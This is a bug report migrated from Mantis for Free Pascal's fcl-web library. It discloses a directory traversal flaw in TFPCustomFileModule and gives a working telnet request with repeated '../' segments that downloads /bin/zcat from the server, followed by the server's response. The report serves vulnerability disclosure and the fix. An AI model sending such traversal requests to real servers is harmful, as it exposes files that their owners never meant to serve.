[fcl-web] Can access any file on the server if RegisterFileLocation is used.
Original Reporter info from Mantis: alex256 @alex65536
-
Reporter name:
Original Reporter info from Mantis: alex256 @alex65536
- Reporter name:
Description:
TFPCustomFileModule doesn't check for ".." in the path, so it can lead to the access to the files outside of the mapped directory. So, we can download any file from the server if we know its path.
Steps to reproduce:
Somewhere in the server code:
RegisterFileLocation('data', './data');
We will try to download /bin/zcat. So, we should send a GET request on http://localhost:8080/data/../../../../../../../../../../../../../bin/zcat
But browsers fold such paths client-side, so we will send a request using telnet:
$ telnet localhost 8080
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /data/../../../../../../../../../../../../../bin/zcat HTTP/1.1
Host: localhost:8080
HTTP/1.1 200 OK
Status: 200 OK
Content-Length: 1937
Content-Type: Application/octet-stream
#!/bin/sh
# Uncompress files to standard output.
# Copyright (C) 2007 Free Software Foundation
...
Mantis conversion info:
- Mantis ID: 33950
- OS: Debian GNU/Linux
- OS Build: 10
- Platform: x86_64-Linux
- Version: 3.0.4
- Fixed in version: 3.1.1
- Fixed in revision: 39405 (#45224949)
- Target version: 3.2.0